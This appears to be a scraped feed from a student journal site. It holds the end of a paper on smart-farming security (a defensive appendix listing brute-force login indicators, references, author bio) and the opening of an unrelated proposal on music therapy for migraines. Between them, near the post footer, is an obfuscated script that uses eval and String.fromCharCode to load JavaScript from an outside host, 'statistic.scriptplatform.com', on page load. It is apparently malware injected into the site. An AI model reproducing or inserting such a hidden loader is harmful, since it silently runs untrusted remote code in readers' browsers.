<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-840x1024.png" alt="" class="wp-image-1512" width="626" height="763" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-840x1024.png 840w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-246x300.png 246w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-768x936.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-920x1122.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-230x280.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-350x427.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM-480x585.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.24-PM.png 958w" sizes="(max-width: 626px) 100vw, 626px" /></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-782x1024.png" alt="" class="wp-image-1513" width="629" height="824" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-782x1024.png 782w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-229x300.png 229w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-768x1006.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-920x1205.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-230x301.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-350x459.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM-480x629.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.38-PM.png 974w" sizes="(max-width: 629px) 100vw, 629px" /></figure>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM.png" alt="" class="wp-image-1514" width="617" height="642" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM.png 962w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM-288x300.png 288w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM-768x800.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM-920x958.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM-230x240.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM-350x365.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.22.56-PM-480x500.png 480w" sizes="(max-width: 617px) 100vw, 617px" /></figure>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-800x1024.png" alt="" class="wp-image-1515" width="610" height="781" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-800x1024.png 800w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-234x300.png 234w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-768x983.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-920x1177.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-230x294.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-350x448.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM-480x614.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.16-PM.png 958w" sizes="(max-width: 610px) 100vw, 610px" /></figure>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM.png" alt="" class="wp-image-1516" width="611" height="525" srcset="https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM.png 956w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM-300x258.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM-768x660.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM-920x791.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM-230x198.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM-350x301.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/12/Screen-Shot-2021-12-12-at-9.24.31-PM-480x413.png 480w" sizes="(max-width: 611px) 100vw, 611px" /></figure>



<h2 class="wp-block-heading"><strong>Appendix B</strong></h2>



<p>According to the Open Web Application Security Project foundation [44], the presence of two or more of the following conditions may indicate that a brute force attack is being attempted:</p>



<ul class="wp-block-list"><li>Many failed logins from the same IP address.</li><li>Logins with multiple usernames from the same IP address.</li><li>Logins for a single account coming from many different IP addresses.</li><li>Excessive usage and bandwidth consumption from a single use.</li><li>Failed login attempts from alphabetically sequential usernames or passwords.</li><li>Logins with a referring URL of someone’s mail or IRC client.</li><li>Referring URLs that contain the username and password in the format &lt;http://user:password@www.example.com/login.htm&gt;.</li><li>If protecting an adult website, referring URLs of known password-sharing sites</li><li>Logins with suspicious passwords hackers commonly use, such as ownsyou (ownzyou), washere (wazhere), zealots, hacksyou, and the like.</li></ul>



<h2 class="wp-block-heading"><strong>References</strong></h2>



<p>[1] The State of Food Security and Nutrition in the World 2020. (2020). FAO, IFAD, UNICEF, WFP and WHO. <a href="https://doi.org/10.4060/ca9692en">https://doi.org/10.4060/ca9692en</a></p>



<p>[2] Virk, Ahmad &amp; Noor, Mehmood Ali &amp; Fiaz, Sajid &amp; Hussain, Saddam &amp; Hussain, Hafiz &amp; Rehman, Muzammal &amp; Ahsan, Muhammad &amp; Ma, Wei. (2020). Smart Farming: An Overview. https://doi.org/10.1007/978-3-030-37794-6_10.</p>



<p>[3] United Nations, Department of Economic and Social Affairs, Population Division (2019). World Population Prospects 2019: Highlights. ST/ESA/SER.A/423.&nbsp;</p>



<p>[4] Lamuka P.O. (2014) Public Health Measures: Challenges of Developing Countries in Management of Food Safety. In: Motarjemi Y. (ed.) Encyclopedia of Food Safety, Volume 4, pp. 20-26. Waltham, MA: Academic Press.</p>



<p>[5]&nbsp; doi:10.3390/agronomy10020207 &nbsp;</p>



<p>[6]Kholoud Y. Najmi, Mohammed A. AlZain, Mehedi Masud, N.Z. Jhanjhi, Jehad Al-Amri, Mohammed Baz,A survey on security threats and countermeasures in IoT to achieve users confidentiality and reliability, Materials Today: Proceedings, 2021, ISSN 2214-7853, <a href="https://doi.org/10.1016/j.matpr.2021.03.417">https://doi.org/10.1016/j.matpr.2021.03.417</a>.</p>



<p>[7] Virginia Department of Agriculture and Consumer Services. (n.d.). Agricultural facts and figures. Retrieved June 27, 2021, from https://www.vdacs.virginia.gov/ markets-and-finance-agriculture-facts-and-figures.shtml&nbsp;</p>



<p>[8]&nbsp; doi:10.3390/electronics9020319</p>



<p>[9] Demestichas, K., Peppes, N., &amp; Alexakis, T. (2020). Survey on Security Threats in Agricultural IoT and Smart Farming. Sensors (14248220), 20(22), 6458. <a href="https://doi.org/10.3390/s20226458">https://doi.org/10.3390/s20226458</a></p>



<p>[10] Ayaz, Muhammad &amp; Uddin, Ammad &amp; Sharif, Zubair &amp; Mansour, Ali &amp; Aggoune, el-Hadi. (2019). Internet-of-Things (IoT)-Based Smart Agriculture: Toward Making the Fields Talk. IEEE Access. PP. 1-1. 10.1109/ACCESS.2019.2932609.</p>



<p>[11] Marcelo Torres, Richard Howitt, Lineu Rodrigues, Analyzing rainfall effects on agricultural income: Why timing matters, EconomiA, Volume 20, Issue 1, 2019, Pages 1-14, ISSN 1517-7580, https://doi.org/10.1016/j.econ.2019.03.006.</p>



<p>[12] Roy, S.K.; De, D. Genetic Algorithm based Internet of Precision Agricultural Things (IopaT) for Agriculture 4.0. Internet Things 2020, 100201. [CrossRef]&nbsp;</p>



<p>[13] Almalki, F.A.; Soufiene, B.O.; Alsamhi, S.H.; Sakli, H. A Low-Cost Platform for Environmental Smart Farming Monitoring System Based on IoT and UAVs. Sustainability 2021, 13, 5908. <a href="https://doi.org/10.3390/su13115908">https://doi.org/10.3390/su13115908</a></p>



<p>[14] ; doi:10.3390/s20041042</p>



<p>[15] Babaa, Saleh &amp; Ahmed, Muneer &amp; Khan, Shahid Ali &amp; Al-Jahdhami, John. (2020). Smart Irrigation System using Arduino with Solar Power. International Journal of Engineering Research and. V9. 10.17577/IJERTV9IS050088.&nbsp;</p>



<p>[16] Ratnadewi, Ratnadewi &amp; Nurdiyanto, Heri &amp; Najmurrokhman, Asep &amp; Prabowo, Cipto &amp; Idmayanti, R &amp; Eteruddin, Hamzah &amp; agus s, Castaka &amp; Kurniasih, N &amp; Siburian, H &amp; Nababan, Darsono &amp; Rahim, Robbi. (2018). Control and Notification Automatic Water Pump with Arduino and SMS Gateway. IOP Conference Series: Materials Science and Engineering. 407. 012160. 10.1088/1757-899X/407/1/012160.&nbsp;</p>



<p>[17] Aluthgama Acharige, Raneesha &amp; Halgamuge, Malka &amp; Wirasagoda, Hemika &amp; Syed, Ali. (2019). Adoption of the Internet of Things (IoT) in Agriculture and Smart Farming towards Urban Greening: A Review. International Journal of Advanced Computer Science and Applications. 10. 11-28. 10.14569/IJACSA.2019.0100402.&nbsp;</p>



<p>[18] OERKE, E. (2006). Crop losses to pests. The Journal of Agricultural Science, 144(1), 31-43. doi:10.1017/S0021859605005708</p>



<p>[19] DOI: 10.1081/E-EPM-120009921</p>



<p>[20] Rustia, Dan Jeric &amp; Lin, Ta-Te. (2017). An IoT-based Wireless Imaging and Sensor Node System for Remote Greenhouse Pest Monitoring. Chemical Engineering Transactions. 58. 10.3303/CET1758101.&nbsp;</p>



<p>[21] <a href="https://arxiv.org/ftp/arxiv/papers/2004/2004.04504.pdf">https://arxiv.org/ftp/arxiv/papers/2004/2004.04504.pdf</a></p>



<p>[22] doi:10.3390/app1012410</p>



<p>[23] Britannica, The Editors of Encyclopaedia. &#8220;Farm machinery&#8221;. Encyclopedia Britannica, 14 Jan. 2020, https://www.britannica.com/technology/farm-machinery. Accessed 10 July 2021.</p>



<p>[24] S. Das, B. K. Mohanta and D. Jena, &#8220;IoT Commercial Drone and It’s Privacy and Security Issues,&#8221; 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA), 2020, pp. 1-4, doi: 10.1109/ICCSEA49143.2020.9132958.</p>



<p>[25] Yaacoub, J. P., Noura, H., Salman, O., &amp; Chehab, A. (2020). Security analysis of drones systems: Attacks, limitations, and recommendations. Internet of Things, 11, 100218. <a href="https://doi.org/10.1016/j.iot.2020.100218">https://doi.org/10.1016/j.iot.2020.100218</a></p>



<p>[26] Kim S.J., Lim G.J., Cho J. Drone flight scheduling under uncertainty on battery duration and air temperature. Comput. Ind. Eng. 2018;117:291–302. [Google Scholar]</p>



<p>[27] Alwateer M., Loke S.W., Zuchowicz A. Drone services: issues in drones for location-based services from human-drone interaction to information processing. J. Locat. Based Serv. 2019;13(2):94–127. [Google Scholar]</p>



<p>[28] Kim A., Wampler B., Goppert J., Hwang I., Aldridge H. Infotech@ Aerospace 2012. 2012. Cyber Attack Vulnerabilities Analysis for Unmanned Aerial Vehicles; p. 2438. [Google Scholar]</p>



<p>[29] Leerburger, Benedict A. &#8220;Agricultural Machines.&#8221; The Gale Encyclopedia of Science, edited by Katherine H. Nemeh and Jacqueline L. Longe, 6th ed., vol. 1, Gale, 2021, pp. 83-87. Gale In Context: Science,&nbsp; link.gale.com/apps/doc/CX8124400057/SCIC?u=tjhs_e&amp;sid=bookmark-SCIC&amp;xid=a42c364d. Accessed 12 July 2021.</p>



<p>[30] Rumsey, J. W., &amp; O’Brien, M. (2021). Agricultural machinery. AccessScience. Retrieved July 12, 2021, from <a href="https://doi.org/10.1036/1097-8542.015600">https://doi.org/10.1036/1097-8542.015600</a></p>



<p>[31] Amaresh A M, Anagha G Rao, Fenaaz Afreen, Moditha N, Syeda Arshiya, 2020, IOT Enabled Pesticide Sprayer withSecurity System by using Solar Energy, INTERNATIONAL JOURNAL OF ENGINEERING RESEARCH &amp; TECHNOLOGY (IJERT) IETE – 2020 (Volume 8 – Issue 11),</p>



<p>[32] Kshirsagar, Pravin. (2020). IOT BASED SMART AGRICULTURE AND AUTOMATIC SEED SOWING ROBOT.&nbsp;</p>



<p>[33] You, L., Yu, S., Liu, H., Wang, C., Zhou, Z., Zhang, L., &amp; Hu, D. (2019). Effects of biogas slurry fertilization on fruit economic traits and soil nutrients of Camellia oleifera Abel. PLOS ONE, 14(5), e0208289.</p>



<p>[34] https://www.scitepress.org/Papers/2019/77601/77601.pdf</p>



<p>[35] Ryu, Minwoo &amp; Yun, Jaeseok &amp; Miao, Ting &amp; Ahn, Il-Yeup &amp; Choi, Sungchan &amp; Kim, Jaeho. (2015). Design and implementation of a connected farm for smart farming system. 1-4. 10.1109/ICSENS.2015.7370624.&nbsp;</p>



<p>[36]Budaev, D. &amp; Lada, Aleksandr &amp; Simonova, E. &amp; Skobelev, Petr &amp; Travin, V. &amp; Yalovenko, O. &amp; Voschuk, Georgy &amp; Zhilyaev, Alexey. (2018). Conceptual design of smart farming solution for precise agriculture. International Journal of Design &amp; Nature and Ecodynamics. 13. 307-314. 10.2495/DNE-V13-N3-307-314.&nbsp;</p>



<p>[37]https://www.researchgate.net/profile/Kristina-Dineva/publication/334735028_SECURITY_IN_IOT_SYSTEMS/links/5d6e2f0ba6fdcc547d75afc0/SECURITY-IN-IOT-SYSTEMS.pdf</p>



<p>[38] M. Gupta, M. Abdelsalam, S. Khorsandroo and S. Mittal, &#8220;Security and Privacy in Smart Farming: Challenges and Opportunities,&#8221; in IEEE Access, vol. 8, pp. 34564-34584, 2020, doi: 10.1109/ACCESS.2020.2975142.</p>



<p>[39] M. A. Ferrag, L. Shu, X. Yang, A. Derhab and L. Maglaras, &#8220;Security and Privacy for Green IoT-Based Agriculture: Review, Blockchain Solutions, and Challenges,&#8221; in IEEE Access, vol. 8, pp. 32031-32053, 2020, doi: 10.1109/ACCESS.2020.2973178.</p>



<p>[40] Yaacoub, J. A., Salman, O., Noura, H. N., Kaaniche, N., Chehab, A., &amp; Malli, M. (2020). Cyber-physical systems security: Limitations, issues and future trends. Microprocessors and microsystems, 77, 103201. <a href="https://doi.org/10.1016/j.micpro.2020.103201">https://doi.org/10.1016/j.micpro.2020.103201</a></p>



<p>[41] Saljooghinejad H., Bhukya W.N. (2012) Layered Security Architecture for Masquerade Attack Detection. In: Cuppens-Boulahia N., Cuppens F., Garcia-Alfaro J. (eds) Data and Applications Security and Privacy XXVI. DBSec 2012. Lecture Notes in Computer Science, vol 7371. Springer, Berlin, Heidelberg. <a href="https://doi.org/10.1007/978-3-642-31540-4_19">https://doi.org/10.1007/978-3-642-31540-4_19</a></p>



<p>[42] Ben Salem, M. (2012). Towards Effective Masquerade Attack Detection. (Doctoral dissertation, Columbia University).</p>



<p>[43] Wang A., Liang R., Liu X., Zhang Y., Chen K., Li J. (2017) An Inside Look at IoT Malware. In: Chen F., Luo Y. (eds) Industrial IoT Technologies and Applications. Industrial IoT 2017. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 202. Springer, Cham. <a href="https://doi.org/10.1007/978-3-319-60753-5_19">https://doi.org/10.1007/978-3-319-60753-5_19</a></p>



<p>[44] <a href="https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks">https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks</a></p>



<p>[45]<a href="https://www.britannica.com/topic/information-system/Computer-crime-and-abuse">https://www.britannica.com/topic/information-system/Computer-crime-and-abuse</a>&nbsp;</p>



<p>[46] <a href="https://csrc.nist.gov/glossary/term/man_in_the_middle_attack">https://csrc.nist.gov/glossary/term/man_in_the_middle_attack</a>&nbsp;</p>



<p>[47] <a href="https://collaborate.mitre.org/attackics/index.php/Technique/T0830">https://collaborate.mitre.org/attackics/index.php/Technique/T0830</a>&nbsp;</p>



<p>[48] <a href="https://us-cert.cisa.gov/ncas/tips/ST04-015">https://us-cert.cisa.gov/ncas/tips/ST04-015</a>&nbsp;</p>



<p>[49] Yarımtepe, Oğuz &amp; Dalkılıç, Gökhan &amp; Ozcanhan, Mehmet. (2015). DDoS Prevention Techniques.&nbsp;</p>



<p>[50] Chakraborty, Sushmita &amp; Kumar, Praveen &amp; Sinha, Bhawna &amp; Professor, Assistnat &amp; Head,. (2019). A STUDY ON DDOS ATTACKS, DANGER AND ITS PREVENTION. 10.1729/Journal.20847.&nbsp;</p>



<p>[51] <a href="https://arxiv.org/ftp/arxiv/papers/2101/2101.05614.pdf">https://arxiv.org/ftp/arxiv/papers/2101/2101.05614.pdf</a></p>



<p>[52] arXiv:1708.05044&nbsp;</p>



<p>[53] <a href="https://www.consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams">https://www.consumer.ftc.gov/articles/how-recognize-and-avoid-phishing-scams</a></p>



<p>[54]<a href="https://www.occ.gov/topics/consumers-and-communities/consumer-protection/fraud-resources/phishing-attack-prevention.html">https://www.occ.gov/topics/consumers-and-communities/consumer-protection/fraud-resources/phishing-attack-prevention.html</a>&nbsp;</p>



<p>[55] A. K. Sood, &amp; S. Zeadally (2016). Drive-By Download Attacks: A Comparative Study. IT Professional, 18(05), 18-25.</p>



<p>[56] Aldwairi, Monther &amp; Hasan, Musaab &amp; Balbahaith, Zayed. (2017). Detection of Drive-by Download Attacks Using Machine Learning Approach. International Journal of Information Security and Privacy. 11. 10.4018/IJISP.2017100102.&nbsp;</p>



<p>[57] <a href="https://doi.org/10.14569/IJACSA.2020.0110481">https://doi.org/10.14569/IJACSA.2020.0110481</a></p>



<p>[58] Devi, Ruby &amp; Venkatesan, R. &amp; Koteeswaran, Raghuraman. (2016). A study on SQL injection techniques. International Journal of Pharmacy and Technology. 8. 22405-22415.&nbsp;</p>



<p>[59] Mohd Yunus, Mohd Amin &amp; Brohan, Muhammad &amp; Mohd Nawi, Nazri &amp; Salwana, Ely &amp; Najib, Nurhakimah &amp; Liang, Chan. (2018). Review of SQL Injection : Problems and Prevention. JOIV : International Journal on Informatics Visualization. 2. 215. 10.30630/joiv.2.3-2.144.&nbsp;</p>



<p>[60] <a href="https://cybersecurity.osu.edu/cybersecurity-you/avoid-threats/what-zero-day-exploit">https://cybersecurity.osu.edu/cybersecurity-you/avoid-threats/what-zero-day-exploit</a>&nbsp;</p>



<p>[61] <a href="https://scholar.afit.edu/cgi/viewcontent.cgi?article=4107&amp;context=etd">https://scholar.afit.edu/cgi/viewcontent.cgi?article=4107&amp;context=etd</a>&nbsp;</p>



<p>[62] Arnold, Thomas &amp; Yang, T.. (2011). Rootkit attacks and protection: a case study of teaching network security. Journal of Computing Sciences in Colleges. 26. 122-129. &nbsp;</p>



<p>[63] Liu, Leian &amp; Yin, Zuanxing &amp; Shen, Yuli &amp; Lin, Haitao. (2012). Research and Design of Rootkit Detection Method. Physics Procedia. 33. 852-857. 10.1016/j.phpro.2012.05.145. &nbsp;</p>



<p>[64] Raza, Mudassar &amp; Iqbal, Muhammad &amp; Sharif, Muhammad &amp; Haider, Waqas. (2012). A Survey of Password Attacks and Comparative Analysis on Methods for Secure Authentication. World Applied Sciences Journal. 19. 439-444. 10.5829/idosi.wasj.2012.19.04.1837.&nbsp;</p>



<p>[65] Rodwald, Przemysław. (2020). Attack on Students’ Passwords, Findings and Recommendations. 10.1007/978-3-030-19501-4_42.&nbsp;</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Tejaswi Koduru</h5><p>Tejaswi is currently a Sophomore at Thomas Jefferson High School for Science and Technology in Virginia. He has studied AI to diagnose diseases in their early stages.
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/an-overview-of-vulnerabilities-in-smart-farming-systems/">An Overview of Vulnerabilities in Smart Farming Systems</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>The Impact of Belief in Treatment Methodology on the Efficacy of Music Therapy in Those with Chronic Migraines</title>
		<link>https://exploratiojournal.com/the-impact-of-belief-in-treatment-methodology-on-the-efficacy-of-music-therapy-in-those-with-chronic-migraines/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=the-impact-of-belief-in-treatment-methodology-on-the-efficacy-of-music-therapy-in-those-with-chronic-migraines</link>
		
		<dc:creator><![CDATA[Karishma Kulshrestha]]></dc:creator>
		<pubDate>Mon, 20 Dec 2021 15:39:52 +0000</pubDate>
				<category><![CDATA[Psychology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[medicine]]></category>
		<category><![CDATA[migraines]]></category>
		<category><![CDATA[music therapy]]></category>
		<category><![CDATA[Research]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1497</guid>

					<description><![CDATA[<p>Karishma Kulshrestha<br />
Thomas Worthington High School</p>
<p>The post <a href="https://exploratiojournal.com/the-impact-of-belief-in-treatment-methodology-on-the-efficacy-of-music-therapy-in-those-with-chronic-migraines/">The Impact of Belief in Treatment Methodology on the Efficacy of Music Therapy in Those with Chronic Migraines</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Karishma Kulshrestha</strong><br><strong>Mentor</strong>: Dr. Andrew Franks<br><em>Thomas Worthington High School&nbsp;</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>Migraine is the sixth most disabling illness in the world and the third most common (Saper, 2021). Many studies have found that migraines have numerous causes, which creates a wide variability in the effectiveness of treatments. In recent years, there has been exploration of alternative methods of treatment, such as music therapy. There have been many studies regarding music therapy and pain treatment, but very few specifically for headaches, and results have been inconclusive. The proposed research seeks to examine the extent to which predisposed beliefs about music therapy impact its efficacy when treating chronic migraines. Over the course of a six-week study, patients will be randomly assigned to one of two experimental treatment conditions whereby they will receive a combination or standard pharmaceutical treatment plus music therapy or standard pharmaceutical treatment plus therapeutic rhythmic class. Patients will also report the degree to which they perceive music therapy and other alternative treatments as effective pain-relieving measures. Patients will also report their pain symptoms weekly. It is anticipated that patients with stronger belief in the efficacy of music therapy, in particular, will experience greater reduction in pain symptoms when in the music therapy condition. The implications of an interaction between treatment efficacy beliefs and actual treatment effectiveness are discussed.</p>



<h4 class="wp-block-heading"><strong>The Impact of Belief in Treatment Methodology on the Efficacy of Music Therapy in Those with Chronic Migraines</strong></h4>



<p>While many people have friends or family members who suffer from migraines, individuals who do not experience migraines themselves may be unaware of how chronic, unpredictable, and often mysterious migraine symptoms are. Approximately 1 billion people around the world have migraines (Pool, 2021), making migraines the third most prevalent illness in the world, along with being the 6th most disabling (Saper, 2021). Lipton et al. (2007) reported that 53.7% of those with migraines were severely impaired.&nbsp; Munakata et al. (2009) found that those with episodic migraine had direct and indirect costs of $1757 per year, and those with transformed migraine had costs of $7750 per year.&nbsp; Those who experience migraine&#8211;as well as their closest family and friends&#8211;are more likely to pursue knowledge regarding migraine causes and treatment (Saper, 2021), but they often find that migraines have many different causes and thus there is wide variability in types of treatment and their efficacy (Dodick &amp; Gargus, 2008). Recently, there has been increasing interest in alternative treatments for migraine sufferers such as yoga (John et. al, 2007), risk factor modification (Schwedt, 2014), and music therapy (Diamante &amp; Roxas, 2020). However, the degree to which such alternative treatments alleviate symptoms may be influenced by patients’ beliefs in their efficacy (e.g., Horne, 1999). Accordingly, the current research proposal seeks to examine how much predisposed beliefs about music therapy impact its efficacy, and if music therapy is actually effective in treating chronic migraines.</p>



<h2 class="wp-block-heading"><strong>Music Therapy</strong></h2>



<p><strong></strong>Music therapy has been examined as a potential treatment for dementia (Vink et. al, 2003), generalized anxiety disorder (Gutiérrez &amp; Camarena, 2015), as well as chronic migraine symptoms (Diamante &amp; Roxas, 2020). Research on the use of music therapy as a treatment for migraines has demonstrated that it shows a significant improvement from no treatment (Oelkers-Ax, 2008). Music therapy has been shown to be effective for those seeking treatment for chronic migraine and tinnitus (Nickel et al., 2005). Additionally, Langenburg and colleagues (1995) did a case study on music therapy as treatment for someone with chronic migraines which demonstrated that it does lessen migraine symptoms. While additional studies have demonstrated similar efficacy for MT as a treatment for migraines (e.g., Diamante &amp; Roxas, 2020), other studies have found that MT, while effective, is no more effective than other alternative treatments (Koenig, 2014). Moreover, music therapy can better improve executive functioning when it is able to provide functional support (Thaut &amp; Hoemberg, 2017). Accordingly, we should expect music therapy to reduce migraine symptoms in patients when used in conjunction with standard treatment, but perhaps not more so than other distracting treatments. However, there are moderating factors that could influence the degree to which individual patients respond to alternative treatments such as music therapy&#8211;one of which may be their belief in the efficacy of music therapy.</p>



<h4 class="wp-block-heading"><strong>Patient’s Beliefs in the Efficacy of Treatment</strong></h4>



<p>The ability of a patient’s belief in the efficacy of certain treatments to affect treatment outcomes has been examined in a variety of contexts. Patients&#8217; beliefs about the type of treatment they’re receiving has been shown to impact the efficacy of that treatment (Horne, 1999). The symptoms of patients suffering from various illnesses were shown to respond more strongly to medical treatment among patients who believe more strongly in the effectiveness of traditional medicine as a treatment (Foulks et. al, 1986): the expectation of a drug’s impact on symptoms strongly influences the therapeutic efficacy of that drug (Bingel et al, 2011). Similarly, Clatworthy et. al found that patients better adhered to their treatment plan when they believed that it would work, and thus they found more benefits from their treatment (2007). In addition, a study regarding the effects of methotrexate on rheumatoid arthritis symptoms found similar results (de Thurah et. al, 2009). Studies have also demonstrated that beliefs regarding severity of the patient’s illness impact the efficacy of the treatment (Marks et al., 1986). However, to the best of our knowledge, no research has yet investigated this moderating influence regarding the efficacy of music therapy in migraine treatment. Accordingly, the current research will assign patients to two conditions of music therapy, one who has strong beliefs in the efficacy of music therapy, and one who does not. These two groups will demonstrate the relationship between belief in the efficacy of treatment and pain reduction.</p>



